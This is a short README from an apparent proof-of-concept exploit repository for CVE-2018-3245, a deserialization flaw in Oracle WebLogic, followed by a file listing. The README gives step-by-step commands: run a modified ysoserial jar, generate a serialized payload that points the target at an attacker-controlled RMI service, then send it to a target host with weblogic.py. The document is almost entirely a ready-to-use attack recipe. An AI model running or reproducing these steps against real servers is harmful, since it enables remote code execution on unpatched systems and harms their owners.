CVE-2018-3245# CVE-2018-3245
## Step 1
`java -jar ysoserial-cve-2018-3245.jar`
```
WHY SO SERIAL?
Usage: java -jar ysoserial-cve-2018-3245.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
CVE_2018_2893_1 @mbechler
CVE_2018_2893_2 @mbechler
CVE_2018_2893_3 @mbechler
CVE_2018_3245 @mbechler
JRMPClient @mbechler
Jdk7u21 @frohoff
```
## Step 2
`java -jar ysoserial-cve-2018-3245.jar CVE_2018_3245 "[RMI_SERVICE_IP]:[PORT]" > poc5.ser`
## Step 3
`python weblogic.py [TARGET_HOST] [PORT] poc5.ser`
[4.0K] /data/pocs/85be8d8f2191b86fbbbbca4958558ba229740cb6
├── [ 629] README.md
├── [5.3K] weblogic.py
└── [7.0M] ysoserial-cve-2018-3245.jar
0 directories, 3 files